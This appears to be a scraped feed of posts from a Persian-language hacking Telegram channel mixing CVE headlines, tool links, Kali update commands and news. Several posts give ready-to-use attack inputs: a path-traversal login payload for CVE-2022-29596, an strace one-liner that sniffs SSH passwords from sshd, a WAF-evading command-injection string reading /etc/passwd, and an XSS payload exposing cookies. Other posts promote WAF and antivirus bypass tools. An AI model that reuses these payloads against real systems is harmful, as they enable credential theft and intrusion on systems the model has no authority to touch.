در صورتی که از کالی لینوکس قدیمی تر استفاده می کنید می تونید به صورت دستی اون رو به آخرین نسخه منتشر شده آپدیت کنید . ترمینال رو باز کنید و دستورات زیر رو وارد کنید .

┌──(LearnExploit㉿kali)-[~]
└─$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list
[...]

┌──(LearnExploit㉿kali)-[~]
└─$ sudo apt update && sudo apt -y full-upgrade
[...]

┌──(LearnExploit㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~
[...]

┌──(LearnExploit㉿kali)-[~]
└─$ [ -f /var/run/reboot-required ] && sudo reboot -f

#kali
——————
0Day.Today
@LearnExploit
@Tech_Army

Burp Suite Version 2022.12.2

آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *

Pass : 311138

#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2022-29596 ( MicroStrategy Enterprise Manager 2022 )

Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054= Login

#microsoft #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2022-2414 ( Hole in pki-core )

The vulnerability allows a remote attacker to obtain the contents of arbitrary files by sending specially crafted HTTP requests.

#POC
——————
0Day.Today
@LearnExploit
@Tech_Army

Project Zero ( Exploiting CVE-2022-42703 - Bringing back the stack attack )

link

#CVE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army

A hacker with his Zero-day 📿

#Fun #0day
——————
0Day.Today
@LearnExploit
@Tech_Army

Sniffing SSH passwords

TL;DR
# pgrep -l sshd
6235 sshd
# strace -f -p 6235 -e trace=write -o capture

Link

#Sniff #SSH
——————
0Day.Today
@LearnExploit
@Tech_Army

In This Ceek

بررسی CVEهای پر سر و صدای این هفته (12 تا 18 آذر 1401) + نگاه یکماهه

https://vrgl.ir/n5EsC

#ITC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army

💠 جادی رو برای گیت‌هاب استارز کاندید کنید
💠گیت‌هاب، پلتفرم توسعه نرم‌افزار، امسال برنامه‌ای برگزار کرده به عنوان ستارگان گیت‌هاب که در اون الهام‌بخش ترین و تاثیرگذارترین برنامه‌نویسان دنیا رو با توجه به رای مردم معرفی میکنه.
💠جادی رو میتونین با نام کاربری زیر برای کاندیدا معرفی کنین

jadijadi

🔗 https://stars.github.com/nominate

🆔 @Webamoozir

Top 10 macOS Malware Discoveries in 2022

Read

#malware #macOS
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2022-45025 ( Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)

Github

#POC #Pdf
——————
0Day.Today
@LearnExploit
@Tech_Army

Filter bypass with regex for OS injection commonly (/"'&|()-;:.,`) block by WAF


E.g.: reading /etc/passwd file:
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Bypass endpoint restrictions

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

داده‌های Cloudflare حاکی از آن است که پس از وقوع اعتراضات در ایران و تسری آن به شهرهای مختلف، ترافیک [و استفاده از] اینترنت با وجود مسدودسازی‌های بسیار، رشد انفجاری داشته است. این روند همچنان در حال افزایش است.

منبع : OFFSEC

#iran
——————
0Day.Today
@LearnExploit
@Tech_Army

XSS Payloads :

</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=prompt(document.cookie)//>\x3e

#XSS
——————
0Day.Today
@LearnExploit
@Tech_Army

CrimeFlare for bypassing websites protected by CloudFlare WAF

Github

#tools #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Exploiting CVE-2022-42703 ( Bringing back the stack attack )

Read

——————
0Day.Today
@LearnExploit
@Tech_Army

Good wordlist for backup files FUZZ

Github

Github

Github

Github

Github

#Wordlist #passlist
——————
0Day.Today
@LearnExploit
@Tech_Army

Hooking System Calls in Windows 11 22H2 like Avast Antivirus ( Research, analysis and bypass )

Read

#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Bypass cloudflare with censys

Youtube

#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

8000+ xss_payloads

Github

#xss #payload
——————
0Day.Today
@LearnExploit
@Tech_Army